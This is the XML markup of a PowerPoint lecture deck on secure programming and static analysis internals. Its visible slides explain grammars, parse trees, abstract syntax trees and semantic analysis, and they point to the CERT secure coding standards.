              </a:rPr>
              <a:t>context-free grammar (CFG) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>to match the token stream. The grammar consists of a set of productions that describe the symbols (elements) in the language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>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6</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971600" y="3356992"/>
            <a:ext cx="6245222" cy="252028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CERT – Secure Coding Standards (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1412776"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Online standards: C/C++/Java/Perl</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51202" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1475656" y="2060848"/>
            <a:ext cx="5674955" cy="4077072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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CERT – Secure Coding Standards (4)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1340768"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example of INT00-C</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52226" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539552" y="1988840"/>
            <a:ext cx="7408780" cy="4248472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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CERT – Secure Coding Standards (5)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Top 10 Secure Coding Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/seccode/Top+10+Secure+Coding+Practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>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Parse Tree Derivation</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771800" y="1412776"/>
            <a:ext cx="4591050" cy="5200650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3429000"/>
            <a:ext cx="2299027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Lex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Yacc</a:t>
            </a:r>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 Syntax Tree</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The purpose of the AST is to provide a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>standardized version of the program suitable for later analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. The AST is usually built by associating tree construction code with the grammar’s production rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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8</a:t>
            </a:fld>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827584" y="3645024"/>
            <a:ext cx="6823936" cy="30243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7467600" cy="778098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Semantic Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="980728"/>
            <a:ext cx="7467600" cy="4565104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>In the compiler world, symbol resolution and type checking are referred to as semantic analysis because the compiler is attributing meaning to the symbols found in the program. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Static analysis tools that use these data structures have a distinct advantage over tools that do not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>After semantic analysis, compilers and more advanced static analysis tools part ways. A modern compiler uses the AST and the symbol and type information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to generate an intermediate representation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Depending on the type of analysis to be performed, a static analysis tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>might perform additional transformations on the AST or might generate its own variety of intermediate representation suitable to its needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>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2658</TotalTime>
  <Words>2948</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>421</Paragraphs>
  <Slides>62</Slides>
  <Notes>15</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62</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="72" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Schoolbook</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>壁窗</vt:lpstr>
      <vt:lpstr>Equation</vt:lpstr>
      <vt:lpstr>Secure Programming  4. Static Analysis Internals (Including BO Code Injection Example)   </vt:lpstr>
      <vt:lpstr>Generic Static Analysis Security Tool</vt:lpstr>
      <vt:lpstr>Building a Model</vt:lpstr>
      <vt:lpstr>Lexical Analysis</vt:lpstr>
      <vt:lpstr>Simple Lexical Analysis Rule</vt:lpstr>
      <vt:lpstr>Parsing</vt:lpstr>
      <vt:lpstr>Parse Tree Derivation</vt:lpstr>
      <vt:lpstr>Abstract Syntax Tree</vt:lpstr>
      <vt:lpstr>Semantic Analysis</vt:lpstr>
      <vt:lpstr>Tracking Control Flow (1)</vt:lpstr>
      <vt:lpstr>Tracking Control Flow (2)</vt:lpstr>
      <vt:lpstr>Tracking Control Flow (3)</vt:lpstr>
      <vt:lpstr>Tracking Control Flow (4)</vt:lpstr>
      <vt:lpstr>Tracking Dataflow (1)</vt:lpstr>
      <vt:lpstr>Tracking Dataflow (2)</vt:lpstr>
      <vt:lpstr>Tracking Dataflow (3)</vt:lpstr>
      <vt:lpstr>Taint Propagation</vt:lpstr>
      <vt:lpstr>Pointer Aliasing</vt:lpstr>
      <vt:lpstr>Analysis Algorithms</vt:lpstr>
      <vt:lpstr>Checking Assertions</vt:lpstr>
      <vt:lpstr>Naïve Local Analysis (1)</vt:lpstr>
      <vt:lpstr>Naïve Local Analysis (2)</vt:lpstr>
      <vt:lpstr>Model Checking</vt:lpstr>
      <vt:lpstr>Global Analysis (1)</vt:lpstr>
      <vt:lpstr>Global Analysis (2)</vt:lpstr>
      <vt:lpstr>Global Analysis (3)</vt:lpstr>
      <vt:lpstr>Global Analysis (3)</vt:lpstr>
      <vt:lpstr>Reporting Result (1)</vt:lpstr>
      <vt:lpstr>Reporting Result (2)</vt:lpstr>
      <vt:lpstr>Grouping and Sorting Results (1)</vt:lpstr>
      <vt:lpstr>Grouping and Sorting Results (2)</vt:lpstr>
      <vt:lpstr>Eliminating Unwanted Results</vt:lpstr>
      <vt:lpstr>Explaining the Significance of the Results (1)</vt:lpstr>
      <vt:lpstr>Explaining the Significance of the Results (2)</vt:lpstr>
      <vt:lpstr>Explaining the Significance of the Results (3)</vt:lpstr>
      <vt:lpstr>Code Injection (1)</vt:lpstr>
      <vt:lpstr>Code Injection (2)</vt:lpstr>
      <vt:lpstr>Code Injection (3)</vt:lpstr>
      <vt:lpstr>Code Injection (4)</vt:lpstr>
      <vt:lpstr>Code Injection (5)</vt:lpstr>
      <vt:lpstr>Code Injection (6)</vt:lpstr>
      <vt:lpstr>Code Injection (7)</vt:lpstr>
      <vt:lpstr>Code Injection (8)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (1)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (2)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (3)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (4)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (5)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (6)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (7)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (8)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (9)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (10)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (11)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (12)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (13)</vt:lpstr>
      <vt:lpstr>Shellcode Demo (14)</vt:lpstr>
      <vt:lpstr>CERT – Secure Coding Standards (1)</vt:lpstr>
      <vt:lpstr>CERT – Secure Coding Standards (2)</vt:lpstr>
      <vt:lpstr>CERT – Secure Coding Standards (3)</vt:lpstr>
      <vt:lpstr>CERT – Secure Coding Standards (4)</vt:lpstr>
      <vt:lpstr>CERT – Secure Coding Standards (5)</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>daisy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Programming   </dc:title>
  <dc:creator>Daisy</dc:creator>
  <cp:lastModifiedBy>wangch</cp:lastModifiedBy>
  <cp:revision>348</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-02-23T03:27:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-03-11T00:17:13Z</dcterms:modified>
</cp:coreProperties>
</file>